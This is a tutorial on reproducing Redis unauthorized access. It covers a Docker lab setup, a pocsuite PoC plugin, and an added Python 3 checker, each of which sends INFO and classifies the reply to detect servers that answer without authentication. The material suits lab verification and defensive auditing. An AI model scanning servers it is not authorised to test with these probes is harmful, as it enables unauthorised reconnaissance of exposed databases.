Reproducing Redis unauthorized access with Docker


Search Docker Hub for the Redis image
docker search redis
Pull the image to the local host
docker pull redis
List the downloaded images
docker images
Run the image
docker run -p 6379:6379 -d redis

-p maps container port 6379 to port 6379 on the host. Without an explicit address the published port binds to 0.0.0.0, so the unauthenticated Redis is reachable from every interface of the host, not just localhost; use -p 127.0.0.1:6379:6379 to keep the lab local.

-d runs the container in the background.

List the running containers
docker ps
PoC code

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pocsuite (Python 2 API) plugin: connect, send INFO, and look for
# "redis_version" in the reply, which only a server that accepts
# commands without AUTH returns.
import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '0'
    version = '1'
    author = 'nw01f'
    vulDate = '2018-10-23'
    createDate = '2018-10-23'
    updateDate = '2018-10-23'
    references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis Unauthorized'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
            redis Unauthorized
    '''
    samples = ['']

    def _verify(self):
        result = {}
        payload = '\x69\x6e\x66\x6f\x0d\x0a'   # the bytes of "info\r\n": an inline INFO command
        # setdefaulttimeout() only applies to sockets created afterwards,
        # so it has to precede socket.socket() for the 4 s timeout to take effect.
        socket.setdefaulttimeout(4)
        s = socket.socket()
        try:
            # self.url is "redis://host" or "redis://host:port"
            host = self.url.split(':')[1].strip('/')
            if len(self.url.split(':')) > 2:
                port = int(self.url.split(':')[2].strip('/'))
            else:
                port = 6379
            s.connect((host, port))
            s.send(payload)
            data = s.recv(1024)
            if data and 'redis_version' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['port'] = port
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            print(e)
        finally:
            s.close()
        return self.parse_attack(result)

    def _attack(self):
        # Read-only plugin: attack mode just re-runs the check
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("error")
        return output


register(TestPOC)
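As an added example (not code from the original page or from the pocsuite project), the following Python 3 script does the check that both the Docker lab above and the PoC need, but decodes the RESP reply instead of searching the first 1024 bytes for a substring: an open server, one that answers NOAUTH because requirepass is set, and one that answers DENIED from protected mode each get their own verdict, and a bulk reply longer than one recv() is read to completion. It assumes the target is reachable over TCP at host:port (default 127.0.0.1:6379, the port published above); the replies in SAMPLE_OPEN, SAMPLE_NOAUTH and SAMPLE_DENIED are constructed for offline runs, not captured from a server. The official redis image is built with protected mode off, which is why a default container answers INFO from the host at all; a self-built Redis 3.2+ with no bind address and no password answers DENIED to the same probe from a non-loopback address.

```python
# Added example: a stand-alone Redis unauthenticated-access check with a small
# RESP decoder. Not from the original page or from pocsuite.
import socket
import sys


def build_inline_command(*words):
    # The framing the PoC uses: the inline form "info\r\n".
    return (" ".join(words) + "\r\n").encode("ascii")


def build_resp_command(*words):
    # Proper RESP array framing, e.g. *1\r\n$4\r\nINFO\r\n, which redis-cli sends.
    parts = [b"*%d\r\n" % len(words)]
    for word in words:
        raw = word.encode("utf-8")
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_reply(buf):
    # Decode one RESP reply: returns (kind, value, remaining bytes). kind is
    # 'status', 'error', 'integer', 'bulk', 'incomplete' or 'unexpected';
    # a bulk value is bytes (None for the nil bulk), status/error values are str.
    nl = buf.find(b"\r\n")
    if not buf or nl < 0:
        return "incomplete", None, buf
    prefix, line, rest = buf[:1], buf[1:nl], buf[nl + 2:]
    if prefix == b"+":
        return "status", line.decode("utf-8", "replace"), rest
    if prefix == b"-":
        return "error", line.decode("utf-8", "replace"), rest
    if prefix == b":":
        return "integer", int(line), rest
    if prefix == b"$":
        length = int(line)
        if length < 0:
            return "bulk", None, rest
        if len(rest) < length + 2:       # body plus its CRLF not fully read yet
            return "incomplete", None, buf
        return "bulk", rest[:length], rest[length + 2:]
    return "unexpected", buf, b""        # arrays are not needed to read INFO


def classify(kind, value):
    # Turn the reply to INFO into a verdict about access control.
    if kind == "bulk" and value is not None and b"redis_version:" in value:
        return "unauthenticated"   # INFO answered without AUTH: the finding
    if kind == "error" and value.startswith("NOAUTH"):
        return "auth_required"     # requirepass is set
    if kind == "error" and value.startswith("DENIED"):
        return "protected_mode"    # Redis 3.2+ protected mode refused the client
    if kind == "incomplete":
        return "incomplete"
    return "unexpected"


def info_field(body, key):
    # Pull one "key:value" line out of the INFO text, e.g. redis_version.
    for line in body.splitlines():
        if line.startswith(key + b":"):
            return line.split(b":", 1)[1].strip().decode("ascii", "replace")
    return None


def check_redis(host, port=6379, timeout=4.0):
    # Connect, send INFO, read until the reply is complete; return (verdict, version).
    # Per-socket timeout: socket.setdefaulttimeout() only affects sockets created later.
    sock = socket.create_connection((host, port), timeout=timeout)
    buf = b""
    try:
        sock.sendall(build_resp_command("INFO"))
        while parse_reply(buf)[0] == "incomplete":
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    finally:
        sock.close()
    kind, value, _ = parse_reply(buf)
    verdict = classify(kind, value)
    version = info_field(value, b"redis_version") if verdict == "unauthenticated" else None
    return verdict, version


def bulk(body):
    return b"$%d\r\n%s\r\n" % (len(body), body)


# Constructed replies for offline runs (not captured from a real server).
SAMPLE_OPEN = bulk(b"# Server\r\nredis_version:5.0.5\r\nredis_mode:standalone\r\n")
SAMPLE_NOAUTH = b"-NOAUTH Authentication required.\r\n"
SAMPLE_DENIED = b"-DENIED Redis is running in protected mode because no password is set.\r\n"


def verdicts_for_samples():
    samples = [("open", SAMPLE_OPEN), ("noauth", SAMPLE_NOAUTH), ("denied", SAMPLE_DENIED)]
    return {name: classify(*parse_reply(reply)[:2]) for name, reply in samples}


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 6379
    print(check_redis(host, port))
```

Run it as python3 redis_check.py 127.0.0.1 6379 against the container: a verdict of unauthenticated together with the version string is the same finding the PoC reports, while auth_required or protected_mode tells you why a substring scanner would otherwise have reported nothing at all.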
Reference links

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
